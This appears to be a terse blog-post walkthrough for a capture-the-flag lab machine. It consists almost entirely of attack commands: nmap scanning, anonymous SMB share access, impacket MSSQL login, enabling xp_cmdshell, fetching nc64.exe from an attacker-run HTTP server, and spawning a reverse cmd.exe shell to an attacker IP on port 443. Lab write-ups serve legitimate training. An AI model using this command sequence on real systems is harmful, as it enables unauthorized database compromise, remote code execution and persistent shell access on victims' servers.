sudo apt install nmap
nmap -sC -sV {TARGET_IP}
sudo apt install smbclient
smbclient -N -L \\\\{TARGET_IP}\\ -N : No password -L : This option allows you to look at what services are available on a server
smbclient -N \\\\{TARGET_IP}\\backups
apt search impacket
sudo apt install impacket-scripts python3-impacket
impacket-mssqlclient.py ARCHETYPE/[email protected]{TARGET_IP} -windows-auth
find ip addr of vpn using ip addr
SQL> EXEC xp_cmdshell 'net user';
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
sp_configure;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
SQL> xp_cmdshell "whoami"cd Downloads
sudo python3 -m http.server 80
sudo nc -lvnp 443
SQL> xp_cmdshell "powershell -c pwd"
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.14.9/nc64.exe -outfile nc64.exe
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.14.139 443"
Comments
Post a Comment